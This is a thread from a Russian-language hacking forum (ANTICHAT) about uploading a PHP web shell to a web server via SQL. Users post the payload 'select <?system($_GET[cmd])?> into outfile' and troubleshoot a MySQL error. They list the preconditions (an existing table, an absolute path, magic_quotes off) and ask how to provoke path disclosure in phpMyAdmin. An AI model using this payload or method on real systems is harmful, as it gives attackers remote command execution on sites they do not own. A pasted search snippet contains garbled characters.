ANTICHAT — форум по информационной безопасности, OSINT и технологиям

хм
Средствами SQL например
select <?system($_GET[cmd])?> into outfile '/путь/к/шеллу.php'

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

Возникал такой же вопрос недели 3 назад...Пытался таим спопобом залить шелл, но не нашёл диру на запись...
Есть ли другой способ?

Никога так не заливал. Решил попробовать вот что выплюнул
Выставил права на 777 и сделал строку типа <? SQL: select <?system($_GET[cmd])?>
Тоже самое.

#1064 - You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '<?php system($_GET[cmd])?> into outfile '/www/sait.ru/php

по синтаксису sql необходимым условием является:
~ указание существующей таблицы
~ абсолютный путь к файлу
~ обрамление ковычками абсолютного пути к файлу, что как следствие требует magic_quotes=OFF либо stripslashes запроса

.. и тот кто реально хоть раз грузил так шелл, должен был это знать...

и как всегда помог Spyder

еще один вопрос можно ли сделать какую либо ошибку в базе данных или в phpMyAdmin что бы определить путь к домашней директории

Я другого способа не знаю, только так имхо

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

Spyder, про гугль я и без тебя знаю. Думал, может на ачате помогут...Ладно будем искать...

Не найдено ни одного документа, соответствующего запросу phpmyadmin раскры% D1‚РёРµ путей.

Рекомендации:
Убедитесь, что все слова написаны без ошибок.
Попробуйте использовать другие ключевые слова.
Попробуйте использовать более популярные ключевые слова.
Попробуйте уменьшить количество слов в запросе.


Вот что на твой запрос выдает